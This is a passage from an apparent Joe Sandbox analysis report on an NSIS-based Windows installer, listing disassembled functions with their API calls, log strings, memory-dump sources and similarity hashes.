                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                          Control-flow Graph (function starting at 402b23; rendered graph and executed/not-executed legend omitted)
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                          • String ID:
                                          • API String ID: 2568930968-0
                                          • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                          • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                          Control-flow Graph (function starting at 402713; rendered graph and executed/not-executed legend omitted)
                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringWritelstrcpyn
                                          • String ID: 135$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                          • API String ID: 247603264-2079820476
                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                          Control-flow Graph (function starting at 4021b5; rendered graph and executed/not-executed legend omitted)
                                          APIs
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                          • API String ID: 3156913733-2180253247
                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: nsa
                                          • API String ID: 1716503409-2209301699
                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                          APIs
                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                          • String ID: HideWindow
                                          • API String ID: 1249568736-780306582
                                          • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                          • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                          APIs
                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree
                                          • String ID:
                                          • API String ID: 3394109436-0
                                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                          APIs
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Char$Next$CreateDirectoryPrev
                                          • String ID:
                                          • API String ID: 4115351271-0
                                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                          APIs
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                          • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                          • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
